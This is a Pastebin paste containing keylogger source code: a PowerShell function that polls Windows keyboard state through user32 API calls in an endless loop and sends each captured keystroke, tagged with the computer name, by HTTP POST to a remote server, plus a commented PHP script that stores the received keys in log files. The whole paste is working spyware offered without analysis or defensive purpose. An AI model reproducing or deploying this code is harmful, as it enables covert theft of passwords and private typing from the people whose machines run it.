Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # PHP Code for logging of keys
- # FYI - need to create a keylogs folder for php script to write to
- #
- # <?php
- # $saving = $_REQUEST['saving'];
- # if ($saving == "1"){
- # $data = $_POST['data'];
- # $file = $_POST['filename'];
- #
- # $fp = fopen("keylogs/".$file, "a") or die("Couldn't open $file for writing!");
- # fwrite($fp, $data) or die("Couldn't write values to file!");
- # fclose($fp);
- # }
- # ?>
- function KeyLog {
- $MAPVK_VK_TO_VSC = 0x00
- $MAPVK_VSC_TO_VK = 0x01
- $MAPVK_VK_TO_CHAR = 0x02
- $MAPVK_VSC_TO_VK_EX = 0x03
- $MAPVK_VK_TO_VSC_EX = 0x04
- $virtualkc_sig = @'
- [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
- public static extern short GetAsyncKeyState(int virtualKeyCode);
- '@
- $kbstate_sig = @'
- [DllImport("user32.dll", CharSet=CharSet.Auto)]
- public static extern int GetKeyboardState(byte[] keystate);
- '@
- $mapchar_sig = @'
- [DllImport("user32.dll", CharSet=CharSet.Auto)]
- public static extern int MapVirtualKey(uint uCode, int uMapType);
- '@
- $tounicode_sig = @'
- [DllImport("user32.dll", CharSet=CharSet.Auto)]
- public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[]
- lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
- '@
- $getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru
- $getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru
- $getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru
- $getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
- while ($true) {
- Start-Sleep -Milliseconds 40
- $gotit = ""
- for ($char = 1; $char -le 254; $char++)
- {$vkey = $char
- $gotit = $getKeyState::GetAsyncKeyState($vkey)
- if ($gotit -eq -32767)
- {$l_shift = $getKeyState::GetAsyncKeyState(160)
- $r_shift = $getKeyState::GetAsyncKeyState(161)
- $caps_lock = [console]::CapsLock
- $scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)
- $kbstate = New-Object Byte[] 256
- $checkkbstate = $getKBState::GetKeyboardState($kbstate)
- $mychar = New-Object -TypeName "System.Text.StringBuilder";
- $unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)
- if ($unicode_res -gt 0)
- {$keydate = get-date -format yyyyMMdd
- $logfile = "$env:computername-$keydate-keys.txt"
- $url = "http://myserver/storage/PostKeys.php"
- $parameters = "saving=1&data=$keys&filename=$logfile"
- $keys = $mychar.ToString()
- $http_request = New-Object -ComObject Msxml2.XMLHTTP
- $http_request.open('POST', $url, $false)
- $http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
- $http_request.setRequestHeader("Content-length", $parameters.length)
- $http_request.setRequestHeader("Connection", "close")
- $http_request.send($parameters)
- }}}}}
- KeyLog
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement